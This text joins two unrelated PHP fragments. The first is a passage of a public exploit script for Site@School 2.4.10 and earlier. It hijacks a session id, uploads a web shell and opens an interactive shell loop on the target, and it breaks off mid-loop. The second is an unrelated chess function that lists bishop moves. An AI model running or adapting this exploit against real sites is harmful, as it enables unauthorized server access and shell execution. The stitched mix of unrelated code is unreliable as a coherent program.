die("not vulnerable!\n\n[-] Exploit failed...probably magic_quotes_gpc = on\n"); } $prefix = $match[1]; } print "\n+-----------------------------------------------------------------------+"; print "\n| Site@School <= 2.4.10 Session Hijacking / File Upload Exploit by EgiX |"; print "\n+-----------------------------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage...: php {$argv['0']} host path \n"; print "\nhost....: target server (ip/hostname)"; print "\npath....: path to sas directory\n"; die; } $host = $argv[1]; $path = $argv[2]; check_target(); $sid = get_sid(); if (empty($sid)) { die("\n[-] Session id not found! Try later...\n"); } else { print "\n[-] Hijacking with sid {$sid}\n"; } if (!($ext = upload())) { die("\n[-] Exploit failed...\n"); } else { print "\n[-] Shell uploaded...starting it!\n"; } while (1) { print "\nsas-shell# "; $cmd = trim(fgets(STDIN)); if ($cmd != "exit") {
function bishop_move_list($board_array, $current_player, $field) { $ret = array($field); // Add current piece for deselection link list($row, $col) = field_to_rowcol($field); $dir = array(true, true, true, true); for ($i = 1; $i < 8; $i++) { if ($dir[0]) { $target = check_target($board_array, $current_player, $row + $i, $col + $i); if ($target == EMPTY_FIELD || $target == OPPONENTS_PIECE) { $ret[] = rowcol_to_field($row + $i, $col + $i); if ($target == OPPONENTS_PIECE) { $dir[0] = false; } } else { $dir[0] = false; } } if ($dir[1]) { $target = check_target($board_array, $current_player, $row - $i, $col - $i); if ($target == EMPTY_FIELD || $target == OPPONENTS_PIECE) { $ret[] = rowcol_to_field($row - $i, $col - $i); if ($target == OPPONENTS_PIECE) { $dir[1] = false; } } else { $dir[1] = false; } } if ($dir[2]) { $target = check_target($board_array, $current_player, $row + $i, $col - $i); if ($target == EMPTY_FIELD || $target == OPPONENTS_PIECE) { $ret[] = rowcol_to_field($row + $i, $col - $i); if ($target == OPPONENTS_PIECE) { $dir[2] = false; } } else { $dir[2] = false; } } if ($dir[3]) { $target = check_target($board_array, $current_player, $row - $i, $col + $i); if ($target == EMPTY_FIELD || $target == OPPONENTS_PIECE) { $ret[] = rowcol_to_field($row - $i, $col + $i); if ($target == OPPONENTS_PIECE) { $dir[3] = false; } } else { $dir[3] = false; } } } return $ret; }